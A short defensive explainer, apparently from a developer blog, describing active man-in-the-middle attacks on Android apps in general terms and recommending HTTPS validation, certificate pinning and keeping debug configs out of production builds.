🧠 What It Is:
In an active MITM attack, the attacker intercepts and modifies communication between two parties without either party knowing.
For example, when your Android app talks to an API over HTTP (or weakly implemented HTTPS), an attacker could inject themselves in the middle — modifying responses like
{"isPremium": false}
→{"isPremium": true}
.
🛠️ How It Works:
-
The attacker tricks the client (your app) into thinking it’s talking to the server.
-
And tricks the server into thinking it’s talking to the client.
-
Often done using:
-
Rogue Wi-Fi hotspots (e.g., public coffee shops)
-
ARP spoofing
-
DNS poisoning
-
Proxy tools like Burp Suite, mitmproxy
-
📱 How It Affects Android Apps:
-
Apps without certificate pinning are vulnerable.
-
Even HTTPS can be intercepted if the attacker installs a root certificate.
-
Debug builds are more vulnerable due to lax network config.
✅ Prevention Tips:
-
Use HTTPS with strict certificate validation.
-
Implement Certificate Pinning using
NetworkSecurityConfig
or libraries like OkHttp’sCertificatePinner
. -
Don’t ship debug configs in production APKs.